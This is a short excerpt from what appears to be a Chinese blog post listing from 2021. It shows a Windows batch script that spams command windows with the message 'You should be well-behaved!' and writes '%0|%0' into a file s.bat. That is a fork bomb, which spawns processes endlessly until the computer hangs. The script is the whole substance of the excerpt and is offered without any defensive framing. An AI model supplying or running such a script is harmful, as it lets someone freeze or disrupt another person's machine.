摘要: @ECHO OFF :start start cmd /k echo You should be well-behaved! for /l %%i in (1,1,100) do (echo You should be well-behaved!) set /p="%0|%0"<nul>s.bat& 阅读全文
posted @ 2021-10-24 09:20 边缘坐标 阅读(13) 评论(0) 推荐(0) 编辑
-->